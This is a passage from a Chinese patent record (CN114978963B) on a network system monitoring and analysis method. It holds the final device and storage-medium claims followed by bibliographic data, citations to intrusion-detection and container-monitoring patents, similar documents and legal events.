9. An electronic device comprising a memory, a processor and a computer program stored on the memory and executable on the processor, the processor implementing a network system monitoring and analysis method according to any one of claims 1 to 7 when the computer program is executed by the processor.
10. A computer readable storage medium, wherein a computer program is stored on the computer readable storage medium, the computer program when executed by a processor implementing a network system monitoring and analysis method according to any one of claims 1 to 7.
CN202210445794.7A 2022-04-26 2022-04-26 Network system monitoring analysis method and device, electronic equipment and storage medium Active CN114978963B (en)

Priority Applications (1)

Application Number Priority Date Filing Date Title
CN202210445794.7A CN114978963B (en) 2022-04-26 2022-04-26 Network system monitoring analysis method and device, electronic equipment and storage medium

Applications Claiming Priority (1)

Application Number Priority Date Filing Date Title
CN202210445794.7A CN114978963B (en) 2022-04-26 2022-04-26 Network system monitoring analysis method and device, electronic equipment and storage medium

Publications (2)

Publication Number Publication Date
CN114978963A CN114978963A (en) 2022-08-30
CN114978963B true CN114978963B (en) 2024-07-05

Family

ID=82980104

Family Applications (1)

Application Number Title Priority Date Filing Date
CN202210445794.7A Active CN114978963B (en) 2022-04-26 2022-04-26 Network system monitoring analysis method and device, electronic equipment and storage medium

Country Status (1)

Country Link
CN (1) CN114978963B (en)

Families Citing this family (1)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
CN117478570B (en) * 2023-12-27 2024-03-22 深圳万物安全科技有限公司 Equipment testing method and device based on containerization technology and storage medium

Citations (2)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
CN107896215A (en) * 2017-11-24 2018-04-10 北京国网富达科技发展有限责任公司 A kind of dispositions method and device of the intruding detection system based on virtual machine
CN110175451A (en) * 2019-04-23 2019-08-27 国家电网公司华东分部 A kind of method for safety monitoring and system based on electric power cloud

Family Cites Families (11)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
US20150089655A1 (en) * 2013-09-23 2015-03-26 Electronics And Telecommunications Research Institute System and method for detecting malware based on virtual host
CN105243008A (en) * 2015-11-02 2016-01-13 上海新炬网络信息技术有限公司 Host machine-based virtual machine performance monitoring method
CN107423110A (en) * 2017-05-31 2017-12-01 郑州云海信息技术有限公司 A kind of virtual machine method of real-time and its device based on libvirt
CN107608758A (en) * 2017-08-31 2018-01-19 郑州云海信息技术有限公司 A kind of virtual machine file integrality monitoring method and system
CN108694092B (en) * 2018-05-11 2021-01-15 华中科技大学 Container communication method and system for parallel application
CN108897604A (en) * 2018-07-03 2018-11-27 北京思空科技有限公司 A kind of intruding detection system, device and method, computer readable storage medium
CN111651237A (en) * 2020-05-22 2020-09-11 国云科技股份有限公司 Method and device for acquiring monitoring data of virtual machine in Docker container
CN111563024B (en) * 2020-07-15 2020-10-16 北京升鑫网络科技有限公司 Method and device for monitoring container process on host machine and computing equipment
CN112084005A (en) * 2020-09-09 2020-12-15 北京升鑫网络科技有限公司 Container behavior auditing method, device, terminal and storage medium
CN112989330B (en) * 2021-02-08 2023-12-12 网宿科技股份有限公司 Container intrusion detection method, device, electronic equipment and storage medium
CN114254304A (en) * 2021-11-30 2022-03-29 深圳依时货拉拉科技有限公司 Container security intrusion detection method and device, computer equipment and storage medium

Patent Citations (2)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
CN107896215A (en) * 2017-11-24 2018-04-10 北京国网富达科技发展有限责任公司 A kind of dispositions method and device of the intruding detection system based on virtual machine
CN110175451A (en) * 2019-04-23 2019-08-27 国家电网公司华东分部 A kind of method for safety monitoring and system based on electric power cloud

Also Published As

Publication number Publication date
CN114978963A (en) 2022-08-30

Similar Documents

Publication Publication Date Title
TWI547874B (en) Virtual machine image analysis
US9021309B2 (en) Method and system for creating virtual editable data objects by using a read-only data set as baseline
US9129058B2 (en) Application monitoring through continuous record and replay
CN114077525A (en) Abnormal log processing method and device, terminal equipment, cloud server and system
CN107577510B (en) Automatic and rapid hardware drive preassembling method and system in diskless environment
US20140222761A1 (en) Terminal Backup and Recovery Method
CN104881483B (en) Automatic detection evidence collecting method for the attack of Hadoop platform leaking data
CN112799925A (en) Data acquisition method and device, electronic equipment and readable storage medium
CN114978963B (en) Network system monitoring analysis method and device, electronic equipment and storage medium
CN112600797A (en) Method and device for detecting abnormal access behavior, electronic equipment and storage medium
JP7451476B2 (en) System and method for cross-referencing forensic snapshots over time for root cause analysis
EP3161661A1 (en) Documentation notification
WO2014204530A1 (en) Passive monitoring of virtual systems using agent-less, near-real-time indexing
JP6213676B2 (en) Analysis device, analysis method, and analysis program
CN109189652A (en) A kind of acquisition method and system of close network terminal behavior data
US20220075769A1 (en) Logfile collection and consolidation
US20210374011A1 (en) Data object backup via object metadata
US20050278789A1 (en) Anomaly-driven software switch to capture event responses and automate recovery
CN114996955A (en) Target range environment construction method and device for cloud-originated chaotic engineering experiment
JP2002312205A (en) Saving processing method for access log information, saving processing device for the same and processing program for the same
JP7074187B2 (en) Monitoring equipment, monitoring methods and programs
Ahmed et al. Analysis of cloud digital evidence
CN114595034B (en) Container mirror image volume reduction method, storage and device
CN110166421B (en) Intrusion control method and device based on log monitoring and terminal equipment
WO2022195737A1 (en) Activity trace extraction apparatus, activity trace extraction method, and activity trace extraction program

Legal Events

Date Code Title Description
PB01 Publication
PB01 Publication
SE01 Entry into force of request for substantive examination
SE01 Entry into force of request for substantive examination
GR01 Patent grant
GR01 Patent grant